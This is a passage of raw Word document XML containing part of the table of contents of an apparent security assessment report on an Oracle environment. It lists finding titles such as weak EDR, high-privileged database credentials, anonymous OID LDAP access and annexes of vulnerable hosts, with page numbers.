            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:bCs/>
              </w:rPr>
              <w:t>EDR) allows malicious actions to go unnoticed</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc213253572 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00706DA2">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>36</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="28553DD6" w14:textId="21E73A36"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3" w:history="1">
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>4.3.7.</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bCs/>
              </w:rPr>
              <w:t>Use of high-privileged Oracle DB credentials for daily operations</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc213253573 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00706DA2">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>38</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="69320F56" w14:textId="25AB0A87"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4" w:history="1">
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>4.3.8.</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Ineffective Oracle DB event auditing allows malicious actions to go unnoticed</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc213253574 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00706DA2">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>40</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="408332DB" w14:textId="29574D25"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5" w:history="1">
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:bCs/>
              </w:rPr>
              <w:t>4.3.9.</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bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Anonymous access to </w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>Oracle Internet Directory (</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:bCs/>
              </w:rPr>
              <w:t>OID) LDAP service reveals Oracle topology</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc213253575 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00706DA2">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>41</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0442C285" w14:textId="0600DAAA"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76" w:history="1">
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>4.3.10.</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bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Unencrypted </w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>Oracle Internet Directory (</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:bCs/>
              </w:rPr>
              <w:t>OID)</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t xml:space="preserve"> LDAP service</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc213253576 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00706DA2">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>43</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="102D1C52" w14:textId="1E062C14"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77" w:history="1">
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof w:val="0"/>
              </w:rPr>
              <w:t>4.4.</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List of Findings and Recommendations</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc213253577 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00706DA2">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:t>44</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2DA42B84" w14:textId="3B18EFA0"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78" w:history="1">
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof w:val="0"/>
              </w:rPr>
              <w:t>4.5.</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MITRE ATT&amp;CK matrix</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc213253578 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00706DA2">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:t>46</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0E262380" w14:textId="0DD72FD2" w:rsidR="00F27A8E" w:rsidRPr="001019D3" w:rsidRDefault="00F27A8E">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:eastAsia="en-IE"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc213253579" w:history="1">
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>5.</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:kern w:val="2"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-IE"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>Annexes</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc213253579 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00706DA2">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>48</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="682C8FFB" w14:textId="56F962F5"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80" w:history="1">
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof w:val="0"/>
              </w:rPr>
              <w:t>5.1.</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Glossary</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc213253580 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00706DA2">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:t>48</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="109C9004" w14:textId="5F45D4A7" w:rsidR="00F27A8E" w:rsidRPr="001019D3" w:rsidRDefault="00F27A8E">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof w:val="0"/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:eastAsia="en-IE"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc213253581" w:history="1">
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof w:val="0"/>
              </w:rPr>
              <w:t>5.2.</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof w:val="0"/>
                <w:kern w:val="2"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-IE"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof w:val="0"/>
              </w:rPr>
              <w:t>Vulnerable Targets Lists</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc213253581 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00706DA2">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:t>51</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="614D9848" w14:textId="2154400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2" w:history="1">
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>5.2.1.</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compromised via vulnerable JDWP service</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc213253582 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00706DA2">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>51</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="78D7F026" w14:textId="3E7BD5A4"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3" w:history="1">
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>5.2.2.</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 used to gain persistence via scheduled jobs</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc213253583 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00706DA2">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>52</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0F24D486" w14:textId="6E305B97"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4" w:history="1">
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>5.2.3.</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used for insecure credential and secrets storage</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc213253584 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00706DA2">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>52</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="12F9CFC1" w14:textId="5AAB9C9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5" w:history="1">
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>5.2.4.</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that contain the WebLogic Scripting Tool (wlst.sh)</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc213253585 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00706DA2">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>52</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="14A3E600" w14:textId="243B62CD"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6" w:history="1">
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>5.2.5.</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with Oracle T3/T3s access</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc213253586 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00706DA2">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>53</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6EBB3B08" w14:textId="546B6618"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7" w:history="1">
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>5.2.6.</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with no effective EDR</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc213253587 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00706DA2">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>53</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1FD4821E" w14:textId="0F5ACC19"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8" w:history="1">
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>5.2.7.</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that reference high-privileged Oracle DB users</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc213253588 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00706DA2">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>55</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="36907511" w14:textId="2A97C503" w:rsidR="00F27A8E" w:rsidRPr="001019D3" w:rsidRDefault="00F27A8E">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:eastAsia="en-IE"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc213253589" w:history="1">
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>5.2.8.</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Servers that revealed the Oracle Internet Directory (</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">OID) </w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>connection string</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc213253589 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00706DA2">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>55</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
